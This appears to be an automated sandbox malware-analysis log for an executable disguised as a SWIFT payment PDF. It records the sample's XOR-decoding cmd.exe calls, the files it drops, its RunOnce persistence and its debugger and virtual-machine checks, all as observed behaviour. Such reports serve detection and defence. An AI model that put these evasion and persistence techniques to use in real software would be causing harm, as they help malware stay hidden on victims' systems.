          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00405EA2 GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_00405EA2
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_10002CE0 push eax; ret 6_2_10002D0E
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\Drikkelse\Nonaddicting.exeJump to dropped file
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BlankbookJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BlankbookJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BlankbookJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce BlankbookJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Mass process execution to delay analysis
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dllJump to dropped file
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeAPI coverage: 0.2 %
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00405454 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,6_2_00405454
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00405E7B FindFirstFileA,FindClose,6_2_00405E7B
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_0040264F FindFirstFileA,6_2_0040264F
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_0040264F FindFirstFileA,136_2_0040264F
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_00405454 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,136_2_00405454
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_00405E7B FindFirstFileA,FindClose,136_2_00405E7B
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\AppData\Local\Temp\nsv10BA.tmpJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\udskriftskartotek\chiromancy\refalling\Nonessential\Uforstaaeligheds.ComJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134625856432.00000000076BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134625856432.00000000076BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeAPI call chain: ExitProcess graph end nodegraph_6-4294
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeAPI call chain: ExitProcess graph end nodegraph_6-4136
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeAPI call chain: ExitProcess graph end nodegraph_136-3313
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeAPI call chain: ExitProcess graph end nodegraph_136-3319
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00402C33 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,6_2_00402C33
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00405EA2 GetModuleHandleA,LoadLibraryA,GetProcAddress,6_2_00405EA2
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
